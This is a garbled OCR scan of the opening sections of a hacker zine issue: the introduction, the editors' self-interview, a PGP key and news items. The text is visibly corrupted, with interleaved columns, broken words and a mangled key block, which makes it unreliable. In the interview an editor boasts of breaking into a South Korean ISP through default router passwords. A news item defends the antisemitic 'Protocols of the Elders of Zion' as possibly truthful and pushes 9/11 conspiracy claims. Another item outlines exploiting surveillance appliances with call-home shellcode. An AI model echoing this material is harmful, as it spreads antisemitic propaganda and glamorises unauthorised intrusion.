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Introduction 


By The Circle of Lost Hackers 


"As long as there is technology, there will be hackers. As long as there 
are hackers, there will be PHRACK magazine. We look forward to the next 
20 years" 


This is how the PHRACK63 Introduction was ending, telling everybody that 
the Staff would have changed and to expect a release sometimes in 
2006/2007. This is that release. This is the new staff, "The Circle of 
Lost Hackers". Every new management requires a presentation and we decided 
to do it by Prophiling ourselves. Useless to say, we’ll keep anonymous, 
mainly for security reasons that everyone understands. 


Being anonymous doesn’t mean at all being closed. Phrack staff has always 
evolved, and will always evolve, depending on who really care about being 
a smart-ass. The staff will always receive new people that cares about 
writing cool articles, meet new authors and help them at publishing their 
work in the best conditions. Grantee of freedom of speech will be 
preserved. It is the identity of our journal. 


Some people were starting to say that phrack would have never reborn. That 
there would have never been a PHRACK64 issue. We heard that while we were 
working on, we smiled and kept going on. Some others were saying that the 
spirit was lost, that everything was lost. 


No, Phrack is not dead. Neither is the spirit in it. 


All the past Phrack editors have done a great work, making the Phrack 
Magazine "the most technical, most original, the most Hacker magazine in 
the world", written by the Underground for the Underground. 

We are in debt with them, every single hacker, cracker or researcher 

of the Underground should feel in debt with them. 

For the work they did. 

For the spirit they contributed to spread. 

For the possibility of having a real Hacker magazine. 


No, nothing is or was ever lost. Things change, security becomes a 
business, some hackers sell exploits, others post for fame, but Phrack is 
here, totally free, for the community. No business, no industry, no honey, 
baby. Only FREEDOM and KNOWLEDGE. 


[7] 


We know the burden of responsibility that we have and that’s why we worked 
hard to bring you this release. It wasn’t an easy challenge at all, we 
have lost some people during those months and met new ones. We decided to 
make our first issue without a "real" CFP, but just limit it to the 
closest people we had in the underground. A big thank to everyone who 
participated. We needed to understand who really was involved and who was 
lacking time, spirit or motivation: having each one a lot of work to do 
(writing, reviewing, extending and coding) was the best way to succeed in 
that. This is not a "change of direction", next issues will have their 
official CFP and whatever article is (and has always been) welcome. 


We know that we have a lot to learn, we’re improving from our mistakes and 
from the problems we’ve been facing. Aswell, we know that this release is 
not "the perfect one", but we think that the right spirit is there and so 
is the endeavor. The promise to mak ach new release a better one is a 
challenge that we want to win. 
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Phrack is not dead. And will never die. 
live to PHRACK. 


No, 
Long 


[The Circle of Lost Hackers 


For this issue, we’re bringing you the following 


0x01 Introduction The Circle of Lost Hackers 
0x02 Phrack Prophile of the new editors The Circle of Lost Hackers 
0x03 Phrack World News The Circle of Lost Hackers 
0x04 A brief history of the Underground scene The Circle of Lost Hackers 
0x05 Hijacking RDS TMC traffic information signal lcars 
danbia 

0x06 Attacking the Cor Kernel Exploitation Notes twiz 
sgrakkyu 

0x07 The revolution will be on YouTube gladio 
0x08 Automated vulnerability auditing in machine code Tyler Durden 
0x09 The use of set_head to defeat the wilderness g463 
OxO0a Cryptanalysis of DPA-128 sysk 
OxO0b Mac OS X Wars - A XNU Hope nemo 
OxO0c Hacking deeper in the system ankhara 
OxO0d The art of exploitation: Autopsy of cvsxpl AcldBltch3z 
Ox0e Facing the cops Lance 
OxO0f Remote blind TCP/IP spoofing Lkm 
0x10 Hacking your brain: The projection of consciousness keptune 
Ox1ll International scenes Various 


Scene Shoutz: 


All the people who helped us during the writing of this issue especialy 


assad, js, mx-, krk, sysk. 


Thank you for your support to Phrack. 


The 


magazine deserve a good amount of work and it is not possible without 


a strong and devoted team of hackers, admins, and coders. 

The circle of lost hackers is not a precise entity and peop 
and quit it, but the main goal is always to give Phrack the 
deserved by the underground hacking community. You can join 


you want to present a decent work to a wider range of peopl 


le can join 


release 
us whenever 
s. W 


also need reviewers on all 
body/mind experience. 


All the retards who pretend to be blackhat on irc and dida 
attempt to leak Phrack on Full-Disclosure Applause ( 
in the title were so subtle, 
code, 


maybe you didnt know how to use uudecode ?) 


Enjoy the magazine! 


topics related to hardware hacking and 


pityful 


Even the changes 
a pity you did not put any rm -fr in the 


[-] 


Nothing may be reproduced in whole or in part without the prior written 


permission from the editors. 


public, as often as possible, free of charge. 


| [CONTACT P AHR A.C K MAGAZIN 


Editors circle[at]phrack{dot}org 


Phrack Magazine is made available to the 


ical 
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Submissions : circle[at]phrack{dot}org 
Commentary : loopback[@]phrack{dot}org 
Phrack World News : pwn[at]phrack{dot}org 


Submissions may be encrypted with the following PGP key: 
(Hint: Always use the PGP key from the latest issue) 


SS, BEGIN PGP PUBLIC KEY BLOCK-----— 
Version: GnuPG v1.4.5 (GNU/Linux) 


mQGiBEZSCpoRBACOVU8+6+Sy9/8Csiz27Vrd0IV9cxhaaGr2xTg/U8rrfizz4ybbZ 
hfFWIv+ttdu6C+JEATIGUKzn9mVJ135EieQcC8bNJ6SXz1LOJHTDhHFSGkG1A8Q0i2k 
/yRPtljPceWWxgCxBfoc8BtvMLUbagSJ/PFzyt+tibwCGfoMxYifbbkRyS8wCgmVUV 
gBmpzy41ls5qzegAqVPOCIyEEAK7b7U jnOqvEjsSqdgHy 9fVOcxJhh1I0/tP8sAvZR 
/juUPGc1 6PtP/HPbgsyccPBZV6sOLY1liu92y7sLZH8Yn9SWI 871 Zvd3dz02KQIRC 
Z1Z+PiSK9ITITVd7ELOm8qgXALESBn jJMA40f6+OckvuGnDTHPmHRsJEnseRr21XiH 
+CmcA/9b1LrNhK4hMwM1ULB/ 3Nnue 3D jkyTTCAAFQx2efTOCUK6ESGONSILS4V1L 
3QWwnMTDsdc37sTBbhM1c6gw jD461z2G4bIWXCZZAb 6mGNHDKKLOVOSW+CN3KtMa 
MOvF qVOKM0JUnzHAHAzL2cyhUquuU 9WYOHMv/ephWeFTooadcrqbQ/VGhlLIENpcmNs 
ZSBvZiBMb3NOTEhhY2tlcnMgKHd3dy5waHJhY2sub3dUnKSA8Y21yY2x1QHBocnF 4 
ayovemctiGYEEXECACYFAkKZSCpoCGwMFCOQPCZwAGCwk I BwMCBBUCCAMEFgIDAQIe 
AQIXgAAKCRCt ZBmMRMD i 98 9eZAJ 9X0 6V6ATXZ1/k5+SG1GF5aRedM60Cg jkhZLVOP 

8 

0 


5 


aNUYru8KVtzfxd0J60om5AgQ0ERLIKrRAIAMgbTDk28 6rkgrJkCFQo9h8Pf1hSBOyT 
yU/BFdOPDKEK8+cMsMt PmSODzBGv5PSa+OWLNPxCyAEXis5sKpoFVT5mEkKFM8FCh 
Z2x7zzZPbI+bzyGMTQ4kPaxoTf2Ng/4ZE1W+iCyyTsSwt jxQkx2M410zW5rygtw2z 
lqrbUN+ikKOQ9c2+oleIxEdWiumeiw7FkypExWjo+7HCC2QnPtBVYzmw5Ed6xDS1L 
rXQt+rKj23L7/KLOWSegQ9zfrrVKISD83kiUg jyopXMBY2t PUGQUF LpsImE8f£NZ3Rm 
hYWO ibpOWUdu6K+DnAu5ZzgYhVAWKR5DQKVTGUY34+n/C2G/7C£MIhrMAAWYH/1Pw 
d1lFmROy 6ZrxEWEGHpYaHkAJP1Vi4VM82v9duYHf1n250idJhjf ITDAHTFZBDn1Bhz 
CgWCwi7 9ytMFOCIHy9Ivf£xG4 JNZVVTX2ZhOfPNullefHop3Gsq7ktAxgKJJDZ4cT 
oVHzZF4uCv7cCrn76BddGhYd7nru5 9yOGDPoV5f7xpNilcxgoQsF20IpyY79cI8co 
jJimET3B1F3Kox0tzV5utvxs 6+tdwP4ed5uGiYJNBCth4yR11CChDDDHJmXGNPJUrr 
+2Y49Hs2b3GsbCyaDaBv3 £Mn9 6t zwcXzWxRV9IQ4/pxot /W7CRpimCM4gHsrw9mZa 
+Lo+Gyk jt zVMMdUeZWal TwOYEQIADWUCRIIKrQIbDAUJA8JnAAAKCRCt ZBmRMDi 9 
80yQAJ9V7DcHjJ42YzpFRC7tPrGP721B/pgCdH jt 52h4ocdJpqs5mKKwb 6yON 4 5xM= 
=Nf2W 

SS-S5 END PGP PUBLIC KEY BLOCK----- 


phrack:~# head -22 /usr/include/std-disclaimer.h 
/* 


* 


information in Phrack Magazine is, to the best of the ability of 
he editors and contributors, truthful and accurate. When possible, 
facts are checked, all code is compiled. However, we are not 
mniscient (hell, we don’t even get paid). It is entirely possible 
omething contained within this publication is incorrect in some way. 
f this is the case, please drop us some email so that we can correct 
it in a future issue. 


“HOO ct Pp 


Also, keep in mind that Phrack Magazine accepts no responsibility for 
the entirely stupid (or illegal) things people may do with the 
information contained herein. Phrack is a compendium of knowledge, 
wisdom, wit, and sass. We neither advocate, condone nor participate 
in any sort of illicit behavior. But we will sit back and watch. 


Lastly, it bears mentioning that the opinions that may be expressed in 
the articles of Phrack Magazine are intellectual property of their 
authors. 

These opinions do not necessarily represent those of the Phrack Staff. 


+ + + + FF + + F F F FF FF FF FF FF FF FF F OF 
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Phrack Pro-Phile 


By The Circle of Lost Hackers 


ome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring 

to you, the users, about old and highly important controversial 
les. The first Phrack Pro-Phile was created in Phrack Issue 4 by 

n King. Since this date, a total of 43 profile were realized. Some 
know hackers were profiled like Taran King, The Mentor, 

h Lighting, Lex Luthor, Emmanuel Goldstein, Erik Bloodaxe, 


Cont 
rece 


This 
the 


rol-C, Mudge, Aleph-One, Route, Voyager, Horizon or more 
ntly Scut. 


prophile is probably a little more different since it will introduce 
new staff. Since the people composing The Circle of Lost Hackers 


want to stay anonymous, the Prophile will be more a "question-answer" 
prophile. 

Personal 

Handle: The Circle of Lost Hackers 

Call them: call them what you want, just be careful 

Handle Origin: Dead Poets Society movie 


Date 


of Birth: from 1977 to 1984 


Age at current date: haha 
Countries of origin: America, South-America and Europe 


Favorite Things 


Women : Angelina Jolie because she was a great hacker in a movie 

Cars Lik veryone, the Dolorean. The only nice car in the 
world. 

Foods : Italian food is without a doubt the best food. Some other 
prefer Chinese or Japanese once they tasted Yakitori’s. 


Alcohols : anything which make you drunk 


Drugs : Sex 

Music : Drum and Bass, Sublime, Orbital, Red Hot Chili Peppers, DJ 
Shadow, The Chemical Brothers, The Mars Volta, more generally 
death metal, and gothic rock. Abstract electro bands like 
Boards of Canada. 

Movies : Blade Runner, The Usual Suspect, Fight Club, Kill Bill, 
hackers (private joke) 

Authors : Gurdjieff, Rufolf Steiner, Rupert Sheldrake, Plato, Stephan 
Hawkings, Roger Penrose, George Orwell, Noam Chomsky, 
Sun Tzu, Nicolas Tesla, Douglas Hofstadter, Ernesto Guevara, 
Daniel Pennac, Gabriele Romagnoli 

Open Interview 


Q: Hello 
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Saluto amigo! 


Can you introduce yourselves in a few words? 

The Circle of Lost Hackers is a group of friends overall. Two years 
ago when TESO decided to stop Phrack, the voice of the underground 
decided not to let Phrack dying. People started to wonder .. Phrack is 
really dead ? In no way it is. Phrack reborns, always, from the 
influence of multiple hacking crews to make this possible. But at the 
beginning it was not easy to create a new team, a lot of people agreed 
to continue Phrack but not really to write or review articles. Also, 
one of the most important thing was to have people with the good 
spirit. Now we think that we have a good team and we hope bring to the 
Underground scene a lot of quality papers like in old issues of Phrack, 
but keeping the technical touch that makes Phrack a unique hacking 
magazine. The Phrack staff evolves and will always evoluate a new 
talents get interested in sharing for fun and free information. 


How many people are composing The Circle of Lost Hackers? 

We could tell you, but we would have to kill you, after. The only 
important thing is that "The Circle of Lost Hackers" is not a 
restricted club. More people will join us, others may leave, depending 
on who really believes in comunication, hacking and freedom of research 
and information. 


When did you start to play with computers and to learn hacking? 

Each one of us could answer differently. There’s not a "perfect" age to 
start, neither it is ever too late to start. Hacking is researching. It 
is being so obstinated on resolving and understanding things to spend 
nights over a code, a vulnerability, an electronic device, an idea. 


Hacking is something you have inside, maybe you’1ll never take a 
computer or write a code, but if you’ve an "hacking mind" it will 
reveal itself, sooner or later. 


To give you an idea of the first computers of some members of the 
team, it was a 286, 486 SX or an Amiga 1000. Each of us started 

to play with computer at the end of 80’ or beginning of 90’. The 
hacking life of our team started more or less around 97. Like with 
a lot of people, Phrack and 2600 mag were and are a great source of 
inspiration, as well as IRC and reading source code. 


This interview is quite strange, you do the questions and the 
answers at the same time ?!?! 

What’s the problem, in phrack issue 20 Taran King did a prophile 
of himself!!! 


Can you tell us what is your most memorable experience? 

Each of us has a lot of memorable experiences but we don’t really have 
a common experience where we hacked all together. So to make easy we 
are going to take three of our "memorable" experiences. 


aie 

A subtle modification about pOf wich made me finding documents 

that I wasn’t supposed to find. Some years ago, I had a period when 
each month I tried to focus on the security of one country. One of 
those countries was South-Korea where I owned a big ISP. After 
spending some time to figure out how I could leave the DMZ and enter 
in the LAN, I succeed thanks to a cisco modification (I like 
default passwords). Once in the LAN and after hiding my activity 
(userland > kernelland), I installed a slightly modification of 
pOf. The purpose if this version was to scan automatically all 

the windows box found on the network, mount shared folders and 

list all files in these folders. Nothing fantastic. But one of 

the computers scanned contained a lot of files about the other 
Korea... North Korea. And trust me, there were files that I 
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wasn’t supposed to find. I couldn’t believe it. I could do the 
evil guy and try to sell these files for money, but I had (and 
I still have) a hacker ethic. So I simply added a text file on 
the desktop to warn the user of the "flaw". After that I left 
the network and I didn’t come back. It was more than 5 years 
ago so don’t ask me the name of the ISP I can’t remember. 


2. 

Learning hacking by practice with some of the best hackers world-wide. 
Sometimes you think you know something but its almost always possible 
to find someone who prove you the opposite. Wether we talk about 
hacking a very big network with many thousands of accounts and know 
exactly how to handle this in minuts in the stealthiest manner, or 
about auditing source code and find vulnerability in a daemon server or 
Operating System used by millions of peoples on the planet, there is 
always someone to find that outsmart you, when you thought being one of 
the best in what you are doing. I do not want to enter in detail to 
avoid compromising anyone’s integrity, but the best experience ar 

those made of small groups (3, 4 ..) of hackers, working on something 
in common (hacking, exploits, coding, audits ..), for example in a 
screen session. Learning by seing the others do. Teaching younger 
hackers. Sharing knowledge in a very restricted personal area. 

Partying in private with hackers from all around the world and getting 
Oday found, coded, and used in a single hacking session. 


Q: Is one of you has been busted in a previous life? 
A: Hope no but who knows? 


Q: What do you think about the current scene? 

A: We think a lot of things, probably the best answer is to read the 
article "A brief history of the Underground" in this issue where 
we are talking about the scene and the Underground. 


Q: What’s your opinion about old phracks? 

A: Great. Old phracks were the first source of information when we were 
starving for more to learn. _The_ point of reference. But don’t stop 
yourselves to the last 10 issues, all issues are still interesting. 


Q: And about PHC? 

A: Well, thats an interesting question. To be honest, PHC did not just do 
those bad things we were used to learn from the web or irc, we like some 
of them and even know very well a few others. Also, the two attempted 
issues 62 and 63 of PHC had an incontestable renew in the spirit and 
there wer ven some useful information on honeypots and protecting 
exploits. 


However, we have a problem with unjustified arrogance. If it’s true 

the security world has a problem with white/black hats, we think that 
the good way to resolve the problem is not to fight everyone, 
especially such a poor demonstrative way. It’s not our conception of 
hacking. Take the first 20 issues of Phrack and try to find unjustified 
arrogant word/sentence/paragraph: you won’t find any. The essence of 
hacking is different : it’s learning. Hacking to learn. 


You can be a blackhat and working in the IT industry, it’s 

not incompatible. We have nothing against PHC and we think the 
Underground needs a group like PHC. But the Underground needs a magazine 
like Phrack as well. The main battle of PHC is fighting whitehats but 
it’s not Phrack’s battle. It’s never been the purpose of Phrack. 

If we have to fight against something, it’s against the society and 

not targeting whitehats personally (that doesn’t mean that we support 
whitehat...). Phrack is about fighting the society by releasing 
information about technologies that we are not supposed to learn. And 
these technologies are not only Unix-related and/or software 
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vulnerabilities. 


We agree with them when they say that recent issues of Phrack helped 
probably too much the security industry and that there was a lack of 
spirit. We’re doing our best to change it. But we still need technical 
articles. If they want to change something in the Underground, they are 
welcome to contribute to Phrack. Like everyone in the Underground 
community. 


Q: Full-disclosure or non-disclosure? 

A: Semi-disclosure. For us, obviously. Free exchange of techniques, ideas 
and codes, but not ready-to-us xploit, neither ready-to-patch 
vulnerabilities. 


Keep your bugs for yourself and for your friend, do the best to not 
make them leak. If you’re cool enough, you’1ll find many and you’1l be 
able to patch your boxes. 


Disclosing techniques, ideas and codes implementations helps the other 
Hackers in their work, disclosing bugs or releasing "0-day" exploits 
helps only the Security Industry and the script kiddies. 

And we don’t want that. 


You might be an Admin, you might be thinking : "oh, but my box is not 
safe if i don’t know about vulnerabilities". That’s true, but remember 
that if only very skilled hackers have a bug you won’t have to face a 
"rm -rf" of the box or a web defacement. That’s kiddies game, not 
Hackers one. 


But that’s our opinion. You might have a totally different one and we 
will respect it. You might even want to release a totally unknown bug 
on Phrack’s pages and, if you write a good article, we’ll help you in 
publishing it. Maybe discussing the idea, befor 


As we said in the introduction, the first thing we want to garantee 
is freedom of speech. That’s the identity of our journal. 


Q: What’s the best advice that you can give to new generation of hackers? 
A: First of all, enjoy hacking. Don’t do that for fame or to earn more 


money, neither to impress girl (hint: not always works ;)) or only to 
be published somewhere. Hack for yourself, hack for your interest, hack 
to learn. 


Second, be careful. In every thing you do, in any relationship you’1ll 
have. Respect people and try to not distrupt their work only because 
you’re distracted or angry. 


Third, have fun. Have a lot of fun. 


And never, never, never setup an honeypot (hi Lance!). 


Q: What do you think about starting an Underground World Revolution 
Movement against the establishment ? 

A: Do it. But do it Underground. The nowadays world is too obsessed by 
"Visibility". Act, let the others talk. 


Q: What’s the future of hacking ? 

A: The future is similar to the present and to the past. "Hacking" is the 
resulting mix of curiosity and research for information, fun and 
freedom. Things change, security evolves and so does technology, but the 
"hacker-mind" is always the same. There will always be hackers, that is 
skilled people who wants to understand how things really go. 


To be more concrete, we think that the near future will see way more 
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interest in hardware and embedded systems hacking : hardware chip 
modification to circumvent hardware based restrictions, mobile and 
mobile services exploits/attacks, etc. 


Moreover, seems like more people is hacking for money (or, at least, 
that’s more "publicly" known), selling exploits or backdoors. Money is 
usually the source of many evils. It is indeed a good motivating factor 
(moreover hacking requires time and having that time payed when you 
don’t have any other work is really helpful), but money brings with 
itself the business mind. People who pays hackers aren’t interested in 
research, they are interested in business. They don’t want to pay for 
months of research that lead to a complex and eleet tecnique, they want 
a simple php bug to break into other companies website and change the 
homepage. They want visible impact, not evolved culture. 


We’re not for the "hacking-business" idea, you probably realized that. 
We’re not for exploit disclosure too, unless the bug is already known 
Since time and showing the exploit code would let better understand the 
coding techniques involved. And we don’t want that someone with a lot of 
money (read : governement and big companies) will be one day able to 
"pay" (and thus "buy") all the hackers around. 


But we’re sure that that will never happen, thanks to the underground, 
thanks to people like you who read phrack, learn, create and hack 
independently. 


Do you have some people or groups to mention ? 
(mentioning some people and say what do u thing about them, phc, etc) 


There are groups and people who have made (or are making) the effective 
evolving of the scene. We try to tell a bit of their story in 
"International Scenes" phile (starting from that issue with : Quebec, 
Brazil and France). Each country has its story, Italy has sOftpj 

and antifork, Germany has TESO, THC and Phenolit (thanks for your great 
ph-neutral party), Russia, France, Netherlands, or Belgium have ADM, 
Synnergy, or Devhell, USA and other countries have PHC... 


Each one will have his space on "International Scenes". If you’re part 
of it, if you want to tell the "real story", just submit us a text. If 
you are too paranoid to submit a tfile to Phrack, its ok. If you wish 
to participate to the underground information, how journal is your 
journal as well and we can find a solution that keep you anonymous. 


Thank you for this interview, I hope readers will enjoy it! 
No problem, you’re welcome. Can I have a beer now? 


HOE-— 
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Phrack World News 


) 
=| 

| 

| 

| compiled by The Circle of Lost Hackers 

| 

| 


The Circle of Lost Hackers is looking for any kind of news related to 
security, hacking, conference report, philosophy, psychology, surrealism, 
new technologies, space war, spying systems, information warfare, secret 
societies, ... anything interesting! It could be a simple news with just 
an URL, a short text or a long text. Feel fr to send us your news. 


Again, we need your help for this section. We can’t know everything, 
we try to do our best, but we need you ... the scene needs you...the 
humanity needs you...even your girlfriend needs you but should already 
know this... :-) 


1. Speedy Gonzales news 

2. One more outrage to the freedom of expression 

3. How we could defeat the Orwellian Narus system 
4. Feeling safer in a spying world 

5. D-Wave computing demonstrates a quantum computer 
Saf hs 
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Speedy News-[ There is no age to start hacking ]-- 


http://www.dailyecho.co.uk/news/latest/display.var. 
1280820.0.how_girl_6_hacked_into_mps_commons_computer.php 


Speedy News-[ Eeye hacked ? ] 
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Speedy News-[ Anarchist Cookbook ]-- 
The anarchist cookbook version 2006, be careful... 


http://www.beyondweird.com/cookbook.html 


Speedy News-[ Is Hezbollah better than Israeli militants? ]-- 


http://www.fcw.com/article96532-10-19-06-Web 


Speedy News-[ How to be secure like an 31337 DoD dude ]-- 


https://addons.mozilla.org/en-US/firefox/addon/3182 


Speedy News-[ Hi I’m Skyper, ex-Phrack and I like Phrack’s design! ]-- 


http://conf.vnsecurity.net/cfp2007.txt 


Speedy News-[ The most obscure company in the world ]-- 


http://www.vanityfair.com/politics/features/2007/03/spyagency200703? 
printable=trueé&currentPage=all 


A "MUST READ" article... 


Speedy News-[ Terrorism excuse Vs freedom of information ]-- 


http://www.usatoday.com/news/washington/2007-03-13-archives_N.htm 


Speedy News-[ Zero Day can happen to anyone ]-- 


http://www. youtube.com/watch?v=L7409RQbkUA 


Speedy News-[ NSA, contractors and the success of failure ]-- 


http://www.govexec.com/dailyfed/0407/040407mm. htm 


Speedy News-[Blood, Bullets, Bombs, and Bandwidth ]-- 


http://rezendi.com/travels/bbbb.html 


Speedy News-[ The day when the BCC predicted the future ]-- 


http://www.prisonplanet.com/articles/february2007/260207building7.htm 
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-Spirit News-[ Just because we like these websites ] 


http://www.cryptome.org/ 
http://www.2600.com/ 


--[ 2. One more outrage to the freedom of expression 
by Napoleon Bonaparte 


The distribution of a book containing a copy of the Protocols of 
the Elders of Zion was stopped in Belgium and France by Israeli 
lobbyists. 


The authors advance that the bombing of the WTC could be in relation with 
Israel. It’s not the good place to argue about this statement, but what 
is interesting is that 6 years after 11/09/01 we read probably more than 
100 theories about the possible authors of WIC bombing: Al Qaeda, Saoudi 
Arabia, Irak (!) or even Americans themselves. But this book advances the 
theory that _maybe_ there is something with Israel and the diffusion is 
forbidden, just one month after its release. 


Before releasing this book, the Belgian association antisemitisme.be 
read it to give his opinion. The result is apparent: the book is not 
antisemitic. The only two things that could be antisemitic in this book 
are: 


- the diffusion of "The Protocols of the Elders of Zion" in the annexe 
of the book. If you take a look on Amazon, you can find more than 
30 books containing The Protocols. 


— the cover of the book which show the US and Israeli flags linked with a 
bundle of dollars. 


Actually you can find the same kind of picture on the website of the 
Americo-Israeli company Zionoil: http://www.zionoil.com/ . And the 

cover of the book was designed before the author found the same picture on 
Zionoil’s website. 


Also, something unsettling in this story is that the book was removed 
on the insistence of a Belgian politician: Claude Marinower. And on the 
website of this politician, we can see him with Moshe Katsav who is the 
president of Israel and recently accused by Attorney General Meni Mazuz 
for having committed rape and other crimes... 


http: //www.claudemarinower.be/uploads/ICJP-israelpresi.JPG 


So why the distribution of this book was banned? Because the diffusion of 
"The Protocols of the Elders of Zion" is dangerous? Maybe but... 


You can find on Internet or amazon some books like "The Anarchist 
Cookbook" which is really more "dangerous" than the "The Protocols of 

the Elders of Zion". In this book you can find some information like how 
to kill someone or how to make a bomb. If we have to give to our children 
either "The Anarchist Cookbook" or "The Protocols of the Elders of Zion", 
I’m sure that 100% of the population will prefer to give "The Protocols 
of the Elders of Zion". Simply because it’s not dangerous. 


So why? Probably because there are some truth in this book. 


The revelations in this book are not only about 11/09/2001 but also about 
the Brabant massacres in Belgium from 1982 to 1985. The authors advances 
that these massacres were linked to the GLADIO/stay-behind network. 


As Napoleon Bonaparte said: "History is a set of lies agreed upon". 
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He was right... 


[1] 
http://www.antisemitisme.be/site/event_detail.asp?language=FRéeventid 
=473&catId=26 


[2] http://www.ejpress.org/article/14608 


[3] 
http://www.wiesenthal.com/site/apps/nl/content2.asp?c=fwLYKnN8LzH&b 
=245494&ct=2439597 


[4] 
http://www.osservatorioantisemitismo.it/scheda_evento.asp?number=1067& 
idmacro=2&n_macro=3&idtipo=59 


[5] http://ro.novopress.info/?p=2278 


[6] http://www.biblebelievers.org.au/przionl.htm 


--[ 3. How we could defeat the Orwellian Narus system 
by Napoleon Bonaparte 


AT&T, Verizon, VeriSign, Amdocs, Cisco, BellSouth, Top Layer Networks, 
Narus, ... all theses companies are inter-connected in our wonderful 
Orwellian world. And I don’t even talk about companies like Raytheon 
or others involved in "ECHELON". 


That’s not new, our governments spy us. They eavesdrop our phones 
conversation, our Internet communications, they take beautiful 

photos of us with their imagery satellites, they can even see through 
walls using satellites reconnaissance (Lacrosse/Onyx?), they install 
cameras everywhere in our cities (how many cameras in London???), 
RFID tags are more and more present and with upcoming technologies like 
nanotechnologies, bio-informatics or smartdusts system there is really 
something to worry about. 


With all these systems already installed, it’s utopian to think that 
we could come back to a world without any spying system. So what we 

can do ? Probably not a lot of things. But I would like to propose a 
funny idea about NARUS, the system allowing governments to eavesdrop 
citizens Internet communications. 


This short article is not an introduction to Narus. I will just give 
you a short description of its capacities. A more longer article 

could be written in a next release of Phrack (any volunteer?). So 
Narus is an American company founded in 97. The first work of NARUS 
was to analyze IP network traffic for billing purpose. In order to 
accomplish this they have strongly contributed to the standardization 
of the IPDR Streaming Protocol by releasing an API Code [1] (study this 
doc, it’s a key to break NARUS). Nowadays, Narus is also included in 
what I will call the "spying business". According to their authors, 
they can collect data from links, routers, soft switches, IDS/IPS, 
databases, ..., normalize, correlate, aggregate and analyze all these 
data to provide a comprehensive and detailed model of users, elements, 
protocols, applications and networks behaviors. And the most important: 
everything is done in real time. So all your e-mails, instant messages, 
video streams, P2P traffic, HTTP traffic or VOIP can be monitored. And 
they doesn’t care about which transmission technology you use, optical 
transmission can also be monitored. This system is simply amazing and 
we should send our congratulations to their designers. But we should 
also send our fears... 
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If we want to block Narus, there is an obvious way: using 

cryptography. Nowadays, it’s quite easy to send an encrypted email. You 
don’t even have to worry about your email client, everything it’s 
transparent (once configured). The problem is that you need to give 
your public key to your interlocutor, which is not really "user 
friendly". Especially if the purpose is simply to send an email to 

your girlfriend. But it’s still the best solution to block a system 
like Narus. Another way to block Narus is to use steganography, but 
it’s more complicate to implement. 


In conclusion, there is no way to stop totally a system like Narus and 
the only good way to block it is to use cryptography. But we, hackers, 
we can do something against Narus. Something funny. The idea is the 
following: we should know where a Narus system is installed! 


First step. An organization, a country or simply someone should buy 

a Narus system and reverse it. There are a lot of tools to reverse a 
system, free or commercial. Since the purpose of Narus is to analyze 
data, the main task is parsing data. And we know that systems parsing 
data are the most sensitive to bugs. So a first idea could be to fuzzing 
it with random requests and if it doesn’t work doing some reversing. Once 
a bug is detected (and for sure, there IS at least one bug), the next 
step is to exploit it. Difficult task but not impossible. The most 
interesting part is the next one: the shellcod 


There are two possibilities, either the system where Narus is installed 
has an outgoing Internet connexion or there isn’t an outgoing Internet 
connexion. If not, the shellcode will be quite limited, the "best" 

idea is maybe just to destroy the system but it’s not useful. What is 
useful is when Narus is installed on a system with an outgoing Internet 
connexion. We don’t want a shell or something like that on the system, 
what we want is to know where a Narus system is installed. So what our 
shellcode has to do is just to send a ping or a special packet to a 
server on Internet to say "hello a Narus is installed at this place". We 
could hold a database with all the Narus system we discover in the world. 


This idea is probably not very difficult to implement. The only bad 
thing is if we release the vulnerability, it won’t take a long time to 
Narus to patch it. 


But after all, what else can we do? 
Again, as Napoleon said: "Victory belongs to the most persevering". 


And hackers are... 


[1] http://www.ipdr.org/public/DocumentMap/SP2.2.pdf 


--[ 4. Feeling safer in a spying world 
by Julius Caesar 


At first, it’s subtle. It just sneaks up on you. The only ones who 
notice are the paranoid tinfoil hat nutjobs the ones screaming about 
conspiracies and big brother. They take a coincidence here and a fact 
from over there and come up with 42. It’s all about 42. 


We need cameras at ATM machines, to catch robbers and muggers. Sometimes 
they even catch a shot of the Ryder truck driving by in the background. 
People get mugged in elevators, so we need some cameras there too. 
Traffic can be backed up for a while before the authorities notice, so 
let’s have some cameras on the highway. Resolution gets better, and we 
can catch more child molestors and terrorists if they can record license 
plates and faces. 


Cameras at intersections catch people running red lights and 
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speeding. We’re getting safer every day. 
Some neighborhoods need cameras to catch the hoods shooting each 


other. Others need cameras to keep the sidewalks safe for shoppers. It’s 
all about safety. 


Then one day, the former head of the KGIA is in charge, or arranges 
for his dimwitted son to fuck up yet again as president of something. 


Soon, we’re at war. Not with anyone in particular. Just Them. You’re 
either with us, or you’re with Them, and we’re gonna to git Them. 


Our phone calls need to me monitored, to make sure we’re not one 

of Them. Our web browsing and shopping and banking and reading and 
writing and travel and credit all need to be monitored, so we can catch 
Them. We’1ll need to be seached when travelling or visiting a government 
building because we might have pointy metal things or guns on us. We 
don’t want to be like Them. 


It’s important to be safe, but how can we tell if we’re safe or not? What 
if we wonder into a place with no cameras? How would we know? What if 
our web browsing isn’t being monitored? How can we make sure we’re safe? 


Fortunately, there are ways. 


Cameras see through a lens, and lenses have specific shapes with unique 
characteristics. If we’re in the viewing area of a camera, then we 

are perpendicular to a part of the surface of the lens, which usually 
has reflective properties. This allows us to know when we’re safely in 
view of a camera. 


All it takes is a few organic LEDs and a power supply (like a 9V 
battery). Arrange the LEDs in a circle about 35mm in diameter, and wire 
them appropriately for the power supply. Cut a hole in the center of 
the circle formed by the LEDs. 


Now look through the hole as you pan around the room. When you’re 
pointing at a lens, the portion of the curved surface of the lens which 
is perpendicular to you will reflect the light of the LEDs directly 
back at you. You’ll notice a small bright white pinpoint. Blink the 
LEDs on and off to make sure it’s reflecting your LEDs, and know that 
you are now safer. 


Worried that your Internet connection may not be properly monitored 
for activity that would identify you as one of Them? There are ways to 
confirm this too. 


Older equipment, such as carnivore or DCS1000 could often be detected 
by traceroute, which would show up as odd hops on your route to the 
net. As recently as 2006, AT&T’s efforts to keep us safe showed up with 
traceroute. But the forces of Them have prevailed, and our protectors 
were forced to stop watching our net traffic. Almost. We can no longer 
feel safe when seeing that odd hop, because it doesn’t show up on 
traceroute anymore. 


It will, however, show up with ping -R, which requests every machine 
to add its IP to the ping packet as it travels the network. 


First, do a traceroute to find out where your ISP connects to the rest 
of the net; 


[snip] 

5 68.87.129.137 (68.87.129.137) 28.902 ms 14.221 ms 13.883 ms 

6 COMCAST-IP.carl.Washingtonl.Level3.net (63.210.62.58) 19.833 ms * 
21.768 ms 

7 te-7-2.carl.Washingtonl.Level3.net (63.210.62.49) 19.781 ms 19.092 
ms 17.356 ms 
